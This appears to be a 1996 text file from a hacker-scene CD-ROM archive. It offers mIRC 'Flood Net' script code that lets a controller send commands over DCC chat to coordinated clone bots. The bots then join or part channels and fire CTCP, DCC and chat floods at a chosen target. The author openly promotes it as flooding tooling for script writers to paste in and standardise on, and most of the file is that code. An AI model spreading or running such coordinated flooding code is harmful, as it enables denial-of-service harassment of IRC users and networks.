home *** CD-ROM | disk | FTP | other *** search
/ HaCKeRz KrOnIcKLeZ 3 / HaCKeRz_KrOnIcKLeZ.iso / scriptz / floodnet.txt < prev    next >
Text File  |  1996-04-23  |  3KB  |  99 lines

  1.             Flood Net ⌐ 1996 precurser
  2.  
  3. Hello! Since you have downloaded this, it means that you want to include 
  4. compatilbe flood net commands in your script. Kick ass! Because it is 
  5. becoming increasingly harder to flood on IRC, we all need a way to combine 
  6. and work with one another. These commands are becoming popular and will 
  7. hopefully be the new standard with your help. 
  8.  
  9. For these commands to work, you need to have aliases for the Following:
  10.  
  11. All CTCP and DCC Floods, Commands for Clones to Join, And part a channel. 
  12. And Delayed join command. These commands are a must! The clone's joining
  13. and parting is vital to the success of the flood net. If you don't have them,
  14. I suggest you add them!
  15.  
  16. Below is all the commands for the flood net. All you need to do is paste them
  17. into the remote events of your script and change the aliases to point to the
  18. right ones in your script. What I mean is this: Where it sais 
  19. { clonejoin $parm 2 } you need to make that your alias for the clones joining
  20. $parm2. So if your alias was called /botjoin replace "clonejoin" with that.
  21. Make sure it all works when your done! If you have additional questions, or
  22. ideas contact me at 7thsphere@geocities.com Also contact me if you have a 
  23. compatible script and you plan to realese it. I want to keep a list of all 
  24. the scipts with it!
  25.  
  26. Paste all of below.
  27.  
  28.  
  29. ------------Cut Here------------------------
  30. ;
  31. ;Flood Net. ⌐ 1996 precurser
  32. ;
  33. #portal enabled
  34. 5:ON CHAT:*!Join*: {
  35.   if ($parm1 == !join) { clonejoin $parm2 }
  36.   if ($parm2 == !join) { clonejoin $parm3 }
  37. }
  38. 5:ON CHAT:*!Part*: {
  39.   if ($parm1 == !Part) { clonepart $parm2 }
  40.   if ($parm2 == !Part) { clonepart $parm3 }
  41. }
  42. 5:ON CHAT:*!Slow*: {
  43.   if ($parm1 == !slow) { slowjoin $parm2 }
  44.   if ($parm2 == !slow) { slowjoin $parm3 }
  45. }
  46. 5:ON CHAT:*!Version*: {
  47.   if ($parm1 == !Version) { vkill $parm2 }
  48.   if ($parm2 == !Version) { vkill $parm3 }
  49. }
  50. 5:ON CHAT:*!Ping*: {
  51.   if ($parm1 == !Ping) { pkill $parm2 }
  52.   if ($parm2 == !Ping) { pkill $parm3 }
  53. }
  54. 5:ON CHAT:*!Userinfo*: {
  55.   if ($parm1 == !Userinfo) { ukill $parm2 }
  56.   if ($parm2 == !Userinfo) { ukill $parm3 }
  57. }
  58. 5:ON CHAT:*!Clientinfo*: {
  59.   if ($parm1 == !Clientinfo) { ckill $parm2 }
  60.   if ($parm2 == !Clientinfo) { ckill $parm3 }
  61. }
  62. 5:ON CHAT:*!Time*: {
  63.   if ($parm1 == !Time) { tkill $parm2 }
  64.   if ($parm2 == !Time) { tkill $parm3 }
  65. }
  66. 5:ON CHAT:*!Finger*: {
  67.   if ($parm1 == !Finger) { fkill $parm2 }
  68.   if ($parm2 == !Finger) { fkill $parm3 }
  69. }
  70. 5:ON CHAT:*!Echo*: {
  71.   if ($parm1 == !Echo) { ekill $parm2 }
  72.   if ($parm2 == !Echo) { ekill $parm3 }
  73. }
  74. 5:ON CHAT:*!Resume*: {
  75.   if ($parm1 == !Resume) { rkill $parm2 }
  76.   if ($parm2 == !Resume) { rkill $parm3 }
  77. }
  78. 5:ON CHAT:*!Accept*: {
  79.   if ($parm1 == !Accept) { Accept $parm2 }
  80.   if ($parm2 == !Accept) { Accept $parm3 }
  81. }
  82. 5:ON CHAT:*!Send*: {
  83.   if ($parm1 == !Send) { dcckill $parm2 }
  84.   if ($parm2 == !Send) { dcckill $parm3 }
  85. }
  86. 5:ON CHAT:*!Chat*: {
  87.   if ($parm1 == !Chat) { Chatkill $parm2 }
  88.   if ($parm2 == !Chat) { Chatkill $parm3 }
  89. }
  90. #portal end
  91. ;
  92. ;Floodnet compatible commands.
  93. ;
  94. ---------End Here--------------------------
  95.  
  96.  
  97. UPLOADED TO WWW.SCRIPTERZ.COM BY |^JoLt^|
  98. (dont wiew this one with Notepad, if ya do it it will look fucked up!)
  99.